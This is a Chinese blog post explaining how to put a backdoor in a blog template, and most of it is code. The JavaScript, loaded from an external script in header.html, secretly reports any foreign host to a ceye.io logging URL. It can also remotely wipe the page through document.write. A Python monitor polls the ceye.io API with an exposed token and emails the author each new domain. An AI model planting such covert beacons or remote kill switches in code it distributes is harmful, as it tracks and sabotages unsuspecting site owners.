d1sbb


Home | Message | Rev Shell | About | Links

[学习] 为博客模板加后门


本站已去除后门

在博客模板的header.html中引用了外部的JS地址

<script src等于"aliyuncscom/demo.min.js"></script> <!--  https://X.com/arouline/demo.min.js -->

完整代码如下:

var host = document.location.host;
var reg = new RegExp(/disbb.com/);
var isok = reg.test(host);
if(!isok){
	var img = document.createElement("img");
    img.src="http://myblog.d5z0tw.ceye.io/fuck?domain=" + host;
	img.style="display:none";
	document.body.appendChild(img);
    var xhr = new XMLHttpRequest();
    xhr.onreadystatechange=function(){
        if(xhr.responseText == "YES"){
        	document.write("<center><h1>Please tell me before using my template!By:[X.com]<center><h1>");
        }
    }
    xhr.open("GET","https://X.com/arouline/isopen.txt",true);
    xhr.send(null);
}

Python 监控

利用ceye.io这个平台的API去实时监控,并且使用邮件发信通知。

导入Python模块 && 全局变量:

#encoding: utf-8
import smtplib,requests,json,urlparse,sys,time
from email.MIMEText import MIMEText
from email.Utils import formatdate
from email.Header import Header

log = {}

1.QQ邮件发信:

def send_mail(domain,ip):
	smtpHost = 'smtp.qq.com'
	smtpPort = '25'
	fromMail = 'X@qq.com'
	toMail = '接收方@qq.com'
	username = 'X@qq.com'
	password = 'X'
	reload(sys)
	sys.setdefaultencoding('utf8')
	subject = u'监控到有人copy您的disbb.com!'
	body = u"[信息]\n Domin: {0}  IP: {1}".format(domain,ip)

	encoding = 'utf-8'
	mail = MIMEText(body.encode(encoding),'plain',encoding)
	mail['Subject'] = Header(subject,encoding)
	mail['From'] = fromMail
	mail['To'] = toMail
	mail['Date'] = formatdate()

	try:
		smtp = smtplib.SMTP(smtpHost,smtpPort)
		smtp.ehlo()
		smtp.login(username,password)
		smtp.sendmail(fromMail,toMail.split(','),mail.as_string())
		print u"邮件已发送,监控信息:"
		print body
	except Exception,e:
		print e
		print u"发送失败,监控信息:"
		print body
	finally:
		smtp.close()

2.ceye.io API调用获取信息,个人中心可以看见API TOKEN,API使用方法

def dnslog_monitor():
	api = "http://api.ceye.io/v1/records?token=613670c89aefe3488f89cb958d4b0370&type=http&filter=myblog"
	r = requests.get(api)
	json_data = json.loads(r.text)
	print json_data
	for i in json_data['data']:
		query = urlparse.urlparse(i['name']).query
		sb_domain = dict([(k, v[0]) for k, v in urlparse.parse_qs(query).items()])['domain']
		sb_ip = i['remote_addr']
		if sb_domain in log:
			pass
		else:
			print sb_domain
			log[sb_domain] = sb_ip
			send_mail(sb_domain,sb_ip)

3.main函数:

def main():
	while True:
		dnslog_monitor()
		time.sleep(3)

if __name__ == '__main__':
     main()

本文作者地址